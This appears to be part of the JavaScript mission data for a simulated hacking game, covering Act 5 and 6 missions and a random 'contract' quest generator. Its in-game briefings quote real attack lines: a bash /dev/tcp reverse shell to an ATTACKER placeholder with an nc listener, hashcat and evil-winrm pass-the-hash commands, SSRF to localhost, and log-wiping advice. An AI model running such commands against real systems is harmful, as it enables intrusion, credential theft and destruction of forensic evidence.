      { type: 'info', text: 'NTDS.dit is the Active Directory equivalent of /etc/shadow.' },
      { type: 'info', text: 'Owning it means owning the domain. Permanently.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.20.100.5  (Domain Controller)' },
      { type: 'warn', text: 'FINAL ACT 5 MISSION. No going back.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: connect 22 → crack → dump → exfil' },
      { type: 'dim',  text: 'Objective: download domain_hashes.ntds' },
    ],
    target: {
      ip:       '10.20.100.5',
      hostname: 'clearwatch-dc-01',
      ports: {
        22:  { service: 'SSH',      banner: 'OpenSSH 8.1 — CLEARWATCH.INT DC', crackable: true, password: 'CW_Svc#2026!', complexity: 'medium' },
        88:  { service: 'Kerberos', banner: 'Microsoft Kerberos KDC',           crackable: false },
        445: { service: 'SMB',      banner: 'Microsoft SMB 3.1.1',              crackable: false },
      },
      files: {
        'domain_hashes.ntds': [
          '# NTDS.dit — DCSync output — CLEARWATCH.INT',
          '# All domain account hashes',
          'Administrator:500:aad3b435b51404eeaad3b435b51404ee:1a2b3c4d5e6f7890aabbccddeeff1122:::',
          'J.Harker:1104:aad3b435b51404eeaad3b435b51404ee:2b3c4d5e6f7890ab1122334455667788:::',
          'cw_svc:1105:aad3b435b51404eeaad3b435b51404ee:3c4d5e6f7890abcd2233445566778899:::',
          'cw_pipeline:1106:aad3b435b51404eeaad3b435b51404ee:4d5e6f7890abcdef3344556677889900:::',
          'cw_backup:1107:aad3b435b51404eeaad3b435b51404ee:5e6f7890abcdef0044556677889900aa:::',
          'M.Osei:1108:aad3b435b51404eeaad3b435b51404ee:6f7890abcdef001155667788990011bb:::',
          '',
          '# Format: user:RID:LM_hash:NTLM_hash',
          '# Crack with: hashcat -m 1000 domain_hashes.ntds rockyou.txt',
          '# Pass-the-hash: evil-winrm -i 10.20.100.5 -u Administrator -H 1a2b3c4d...',
        ].join('\n'),
        'clearwatch_case_db.sql': '-- Full ClearWatch case management DB\nSELECT * FROM active_hunts;\n-- 1 row: GHOST_OPERATOR, ACTIVE, assigned J.Harker\n-- Status: NEUTRALISED (domain compromised)',
        'voss_comm_log.txt':      'Encrypted comms log between ClearWatch and VOSS_OFFICE\nRef: CW-2026-0419\n2026-04-19 08:00: Voss: "Find the operator. Cost is no object."\n2026-04-19 10:30: Harker: "We have their fingerprint. Moving to phase 2."\n2026-04-19 11:55: Harker: "We\'ve lost the core server. Domain may be compromised."',
      },
      enumVectors: [
        'DCSync rights available via cw_svc WriteOwner chain (found by BloodHound)',
        'NTDS.dit accessible — run dump to extract all hashes',
      ],
    },
    reward:  { crypto: 5000 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('domain_hashes.ntds'); },
  },

  // ── Act 6: Zero Evidence ──────────────────────────────────────

  {
    id: 'a6m1',
    act: 6,
    title: 'Dead Drop',
    objective: 'Inspect contact_payload.bin to extract the journalist\'s dead drop key',
    briefing: [
      { type: 'sys',  text: '[ ENCRYPTED CONTACT — ACT 6 — 13:14:07 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'ClearWatch is down. The domain is yours.' },
      { type: 'info', text: 'Now finish what you started.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'An anonymous contact left you a binary — contact_payload.bin.' },
      { type: 'info', text: 'It contains a dead drop key for a journalist.' },
      { type: 'info', text: 'The key is embedded as a hardcoded string.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Binary analysis — strings inspection:' },
      { type: 'info', text: '  The "strings" utility extracts printable text from' },
      { type: 'info', text: '  binary files. Developers often leave secrets compiled' },
      { type: 'info', text: '  in: API keys, passwords, internal URLs.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.30.0.5' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → ls → inspect contact_payload.bin' },
      { type: 'dim',  text: 'New command: inspect <file> — extract hardcoded strings from binaries.' },
    ],
    target: {
      ip:       '10.30.0.5',
      hostname: 'anon-dropbox-srv',
      ports: {
        22:  { service: 'SSH',  banner: 'OpenSSH 7.9 — Anonymous Drop Server', crackable: true, password: 'dr0p_4cc3ss!', complexity: 'low' },
        80:  { service: 'HTTP', banner: 'nginx/1.18 — File Drop UI',            crackable: false },
      },
      files: {
        'contact_payload.bin': [
          '[ELF BINARY — x86_64]',
          'Sections: .text .data .rodata .bss',
          '',
          'Embedded strings (run inspect to analyse):',
          'deadDropPassword=Wh1stl3bl0w3r_2026!',
          'deadDropURL=https://drop.freepress.org/submit',
          'deadDropKey=fp_drop_key_7c3f9a2b1e4d8c6f',
          'apiToken=Bearer sk-fp-7f3dc92a1b4e8a2d',
          'contactEmail=leaks@freepress.org',
          'BUILD_VERSION=release-1.0.0',
          'DEBUG=false',
        ].join('\n'),
        'readme.txt': 'Left by: ANON_CONTACT_7\nFor: GHOST_OPERATOR\nInstructions: inspect the binary. The rest is inside.',
        'pgp_pubkey.asc': '-----BEGIN PGP PUBLIC KEY BLOCK-----\nmQINBGXzPqsBEADK...[TRUNCATED]\n-----END PGP PUBLIC KEY BLOCK-----',
      },
    },
    reward:  { crypto: 1500 },
    unlocks: [],
    check(G) { return G.downloadedFiles.some(f => f.startsWith('inspect_contact_payload')); },
  },

  {
    id: 'a6m2',
    act: 6,
    title: 'Shell Storm',
    objective: 'Authenticate to the press drop server and generate a reverse shell payload',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 14:02:19 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The journalist\'s drop server is ready.' },
      { type: 'info', text: 'You need direct shell access to upload the evidence package.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Reverse shells:' },
      { type: 'info', text: '  A payload that makes the TARGET connect back to YOU.' },
      { type: 'info', text: '  Bypasses firewalls — inbound is blocked, outbound isn\'t.' },
      { type: 'info', text: '  Listener: nc -lvnp 4444' },
      { type: 'info', text: '  Payload:  bash -i >& /dev/tcp/ATTACKER/4444 0>&1' },
      { type: 'info', text: '' },
      { type: 'info', text: 'ShellBuilder generates staged payloads for bash,' },
      { type: 'info', text: 'python3, netcat, and PHP in one command.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.30.0.20' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 80 → inject → shell bash' },
      { type: 'dim',  text: 'New command: shell [type] — generate reverse shell payloads.' },
    ],
    target: {
      ip:       '10.30.0.20',
      hostname: 'freepress-drop-srv',
      ports: {
        80:  { service: 'HTTP',  banner: 'Apache/2.4.54 — FreePressOrg Drop Portal', crackable: false, injectable: true },
        22:  { service: 'SSH',   banner: 'OpenSSH 9.0 — Key Auth Only',              crackable: false },
        443: { service: 'HTTPS', banner: 'SSL/TLS — Secure Upload',                  crackable: false },
      },
      files: {
        'upload_api.txt':   'POST /api/upload  — multipart/form-data, auth required\nPOST /api/publish — triggers public release, internal only\nAuth: session token or API key',
        'server_info.txt':  'FreePressOrg secure evidence server\nPGP verification enabled\nTor hidden service: freepress3xyzabc.onion',
      },
    },
    reward:  { crypto: 2000 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('shell_payload.txt'); },
  },

  {
    id: 'a6m3',
    act: 6,
    title: 'Paper Shredder',
    objective: 'Analyse and wipe all tracking logs on Voss\'s final surveillance server (10.30.0.35)',
    briefing: [
      { type: 'sys',  text: '[ MISSION BRIEF — 15:18:44 ]' },
      { type: 'info', text: '' },
      { type: 'info', text: 'One server left. Voss\'s private tracking node.' },
      { type: 'info', text: 'Six months of your activity — source IPs, timestamps,' },
      { type: 'info', text: 'tool signatures. If investigators get this, it\'s over.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Two steps:' },
      { type: 'info', text: '  1. logs  — analyse the entries (know what they know)' },
      { type: 'info', text: '  2. wipe  — scrub everything: auth.log, wtmp, lastlog,' },
      { type: 'info', text: '            bash_history, and all custom audit files.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Real ops use log-rotate tampering, inode overwriting,' },
      { type: 'info', text: 'and shred(1) to prevent forensic recovery.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.30.0.35' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 22 → crack → logs → wipe' },
      { type: 'dim',  text: 'Commands: logs — analyse for IOCs. wipe — scrub all traces.' },
    ],
    target: {
      ip:       '10.30.0.35',
      hostname: 'voss-track-node',
      ports: {
        22:  { service: 'SSH',    banner: 'OpenSSH 8.2 — Voss Surveillance Node', crackable: true, password: 'Surv3ill@nce!', complexity: 'medium' },
        514: { service: 'Syslog', banner: 'rsyslog — Central Ingestion',           crackable: false, hidden: true },
      },
      files: {
        'auth.log': [
          '2026-03-12 22:11 sshd: Accepted from 185.220.101.47 — session opened',
          '2026-03-30 01:32 sshd: Accepted from 185.220.101.47 — session opened',
          '2026-04-19 03:47 sshd: Accepted from 185.220.101.47 — GHOST_OP fingerprint match',
          '2026-04-19 14:43 sip:  Credential capture event — voip_creds.pcap generated',
          '2026-04-19 20:14 http: Stego extraction detected on gallery server',
          '2026-04-19 23:01 sftp: Large file transfer 18.7MB from 10.50.0.1',
          '>>> ALL ENTRIES REFERENCE YOU. WIPE THIS LOG. <<<',
        ].join('\n'),
        'operator_ioc.txt': [
          '=== GHOST OPERATOR IOC PROFILE ===',
          'Source ASN:    AS4242 (Tor exit nodes)',
          'Exit IPs:      185.220.101.x range',
          'Toolmark:      SIP sniffer cadence, SQLi timing, custom crack delay',
          'First seen:    2026-03-12',
          'Last seen:     2026-04-19',
          'Confidence:    HIGH',
          'Status:        ACTIVE — DO NOT ALERT',
        ].join('\n'),
        'wtmp':    '[Binary session log — 6 months of logins from 185.220.101.x range]',
        'syslog':  '[2026-04-19] kernel: iptables ACCEPT src=185.220.101.47 dst=10.30.0.35 dpt=22\n[2026-04-19] cron: backup job completed — 3.2GB sent to 10.50.0.1',
      },
    },
    reward:  { crypto: 3000 },
    unlocks: [],
    check(G) { return G.wipedHosts.includes('10.30.0.35'); },
  },

  {
    id: 'a6m4',
    act: 6,
    title: 'PRESS RELEASE',
    objective: 'Trigger the press API via SSRF and download the publish confirmation',
    briefing: [
      { type: 'sys',  text: '[ FINAL MISSION — 16:00:00 ]' },
      { type: 'err',  text: '' },
      { type: 'err',  text: 'This is it.' },
      { type: 'err',  text: '' },
      { type: 'info', text: 'The evidence is assembled:' },
      { type: 'info', text: '  ✓ Helios manifest — civilian surveillance pipeline' },
      { type: 'info', text: '  ✓ Grid schema — infrastructure blackout capability' },
      { type: 'info', text: '  ✓ Voss emails — proof of conspiracy' },
      { type: 'info', text: '  ✓ ClearWatch takedown — their hunter, neutralised' },
      { type: 'info', text: '  ✓ Domain hashes — full AD compromise documented' },
      { type: 'info', text: '' },
      { type: 'info', text: 'The publish API is internal-only — localhost only.' },
      { type: 'info', text: 'Use SSRF to make the server call its own API.' },
      { type: 'info', text: 'SSRF — Server-Side Request Forgery:' },
      { type: 'info', text: '  You control the URL the server fetches.' },
      { type: 'info', text: '  Point it at http://localhost/api/publish' },
      { type: 'info', text: '  It calls itself — triggering the release from inside.' },
      { type: 'info', text: '' },
      { type: 'warn', text: 'Target IP: 10.30.0.50' },
      { type: 'warn', text: 'No going back after this.' },
      { type: 'info', text: '' },
      { type: 'info', text: 'Route: scan → connect 443 → inject → ssrf http://localhost/api/publish → download press_receipt.txt' },
      { type: 'dim',  text: 'Final command: ssrf — make the server call its own internal API.' },
    ],
    target: {
      ip:       '10.30.0.50',
      hostname: 'freepress-publish-srv',
      ports: {
        443: { service: 'HTTPS', banner: 'nginx/1.22 — FreePressOrg Secure Publish', crackable: false, injectable: true },
        80:  { service: 'HTTP',  banner: 'nginx/1.22 — Redirect to HTTPS',           crackable: false },
        22:  { service: 'SSH',   banner: 'OpenSSH 9.1 — Key Auth Only',              crackable: false },
      },
      files: {
        'api_status.txt':    'FreePressOrg Publish API\n/api/status  → 200 OK\n/api/publish → 403 Forbidden (localhost only)\n/api/verify  → 200 OK',
        'press_receipt.txt': [
          '=== FREEPRESS.ORG — PUBLISH CONFIRMATION ===',
          'Timestamp:  2026-04-19 16:00:00 UTC',
          'Bundle ID:  FP-2026-0419-HELIOS',
          'Status:     PUBLISHED',
          '',
          'Files received and verified:',
          '  ✓ blacksite_manifest.txt',
          '  ✓ grid_schema.dec',
          '  ✓ zero_day_proof.txt',
          '  ✓ helios_decoded.pdf',
          '  ✓ domain_hashes.ntds',
          '  ✓ analyst_brief.txt',
          '',
          'Distribution: 847 journalists, 23 countries',
          'Tor mirror:   freepress3xyzabc.onion/helios',
          '',
          'Senator R. Voss and D. Cross arrested — 16:42 UTC',
          'Project Helios shutdown order issued — 17:01 UTC',
          '',
          'You exposed a surveillance conspiracy that reached',
          'the highest levels of government.',
          '',
          'No name. No face. No trace.',
          '',
          'Ghost Operator — mission complete.',
          '============================================',
        ].join('\n'),
      },
      ssrfTargets: {
        'http://localhost/api/publish': [
          '{"status":"ok","message":"Evidence bundle received and verified.",',
          '"bundle_id":"FP-2026-0419-HELIOS","files_verified":6,',
          '"distribution":"847 journalists — publishing in 60 seconds",',
          '"receipt":"press_receipt.txt"}',
        ].join('\n'),
      },
    },
    reward:  { crypto: 10000 },
    unlocks: [],
    check(G) { return G.downloadedFiles.includes('press_receipt.txt'); },
  },
];

// ── Free mode quest generation ────────────────────────────────

const _COMPANIES = [
  'NexusCorp',   'Axiom Data',    'Helix Systems',  'Vortex Technologies',
  'Apex Finance','Cipher Labs',   'Meridian Group', 'Solaris Bank',
  'Kronos Logistics','Titan Networks','Pulsar Media','Orbit Analytics',
  'Stratum Ltd', 'Cobalt Systems','Zenith Corp',    'Paragon Data',
];
const _SUFFIXES  = ['srv-01','db-prod','files-02','backup-01','web-03','intranet','store-02'];
const _IP_PFXS   = ['172.16.0.','10.10.0.','192.168.10.','10.20.0.','172.31.0.'];
const _FILES     = [
  'employee_records.csv','salary_data.csv','api_keys.txt',
  'client_list.csv',     'financial_q3.csv','contracts.txt',
  'user_database.sql',   'access_tokens.json','audit_log.txt',
  'config_backup.conf',  'internal_report.txt','password_backup.txt',
];
const _PASSWORDS = [
  'admin123','letmein','company2024','qwerty1','password1',
  'welcome1','summer2025','test1234','login123','corp2024',
];
const _SSH_BANNERS  = ['OpenSSH 7.9','OpenSSH 8.2','OpenSSH 7.4','Dropbear SSH 2020'];
const _HTTP_BANNERS = ['Apache/2.4.41','nginx/1.18.0','Apache/2.4.6','nginx/1.20.1'];

function _rnd(arr) { return arr[Math.floor(Math.random() * arr.length)]; }
function _rndInt(lo, hi) { return Math.floor(Math.random() * (hi - lo + 1)) + lo; }

function _fileContent(name, company) {
  const slug = company.toLowerCase().replace(/\s+/g, '');
  if (name.endsWith('.csv'))  return `id,name,email\n1,J. Chen,j.chen@${slug}.corp\n2,M. Osei,m.osei@${slug}.corp\n3,A. Patel,a.patel@${slug}.corp`;
  if (name.endsWith('.json')) return `{"api_key":"sk-${Math.random().toString(36).slice(2,14)}","env":"production","org":"${company}"}`;
  if (name.endsWith('.sql'))  return `-- ${company} user dump\nINSERT INTO users VALUES (1,'admin','$2b$10$hashed...');\nINSERT INTO users VALUES (2,'guest','$2b$10$hashed...');`;
  if (name.endsWith('.conf')) return `[server]\nhost=db.${slug}.internal\nport=5432\npassword=REDACTED\nssl=true`;
  return `[${company} CONFIDENTIAL]\nDate: ${new Date().toISOString().slice(0,10)}\nInternal use only.`;
}

function generateQuest(tools) {
  const types = ['ssh_exfil'];
  if (tools.includes('sqli_kit')) types.push('web_inject');

  const type    = _rnd(types);
  const company = _rnd(_COMPANIES);
  const slug    = company.toLowerCase().replace(/\s+/g, '-');
  const ip      = `${_rnd(_IP_PFXS)}${_rndInt(10, 240)}`;
  const hostname = `${slug}-${_rnd(_SUFFIXES)}`;
  const file    = _rnd(_FILES);
  const reward  = type === 'web_inject' ? _rndInt(130, 280) : _rndInt(60, 160);
  const diff    = reward >= 200 ? 'HIGH' : reward >= 120 ? 'MED' : 'LOW';

  const shared = {
    id: 'fq_' + Date.now(),
    type, company, hostname,
    title: `Contract: ${company}`,
    objective: `Exfiltrate ${file} from ${ip}`,
    reward: { crypto: reward },
    _file: file,
    check(G) { return G.downloadedFiles.includes(file); },
  };

  if (type === 'ssh_exfil') {
    const pw = _rnd(_PASSWORDS);
    return {
      ...shared,
      briefing: [
        { type: 'sys',  text: '[ INCOMING CONTRACT ]' },
        { type: 'info', text: '' },
        { type: 'info', text: `Target:     ${company}` },
        { type: 'warn', text: `IP:         ${ip}` },
        { type: 'info', text: `Objective:  Download ${file}` },
        { type: 'info', text: `Payout:     ${reward} CRYPTO  [${diff}]` },
        { type: 'info', text: '' },
        { type: 'dim',  text: 'Route: scan → connect 22 → crack → ls → download' },
      ],
      target: {
        ip, hostname,
        ports: {
          22: { service: 'SSH',  banner: `${_rnd(_SSH_BANNERS)} — ${company}`, crackable: true, password: pw, complexity: 'low' },
          80: { service: 'HTTP', banner: `${_rnd(_HTTP_BANNERS)} — ${company} Portal`, crackable: false },
        },
        files: {
          [file]:       _fileContent(file, company),
          'readme.txt': `${company} internal server\nOps: ops@${slug}.corp`,
        },
      },
    };
  }

  return {
    ...shared,
    briefing: [
      { type: 'sys',  text: '[ INCOMING CONTRACT ]' },
      { type: 'info', text: '' },
      { type: 'info', text: `Target:     ${company} (web portal)` },
      { type: 'warn', text: `IP:         ${ip}` },
      { type: 'info', text: `Objective:  Download ${file}` },
      { type: 'info', text: `Payout:     ${reward} CRYPTO  [${diff}]` },
      { type: 'info', text: '' },
      { type: 'dim',  text: 'Route: scan → connect 80 → inject → ls → download' },
    ],
    target: {
      ip, hostname,
      ports: {
        80:  { service: 'HTTP',  banner: `${_rnd(_HTTP_BANNERS)} — ${company} Portal`, crackable: false, injectable: true },
        22:  { service: 'SSH',   banner: `${_rnd(_SSH_BANNERS)} — Hardened`,           crackable: false },
        443: { service: 'HTTPS', banner: 'SSL/TLS',                                    crackable: false },
      },
      files: {
        [file]:      _fileContent(file, company),
        'index.php': `<!-- ${company} Portal v2 -->`,
      },
    },
  };
}
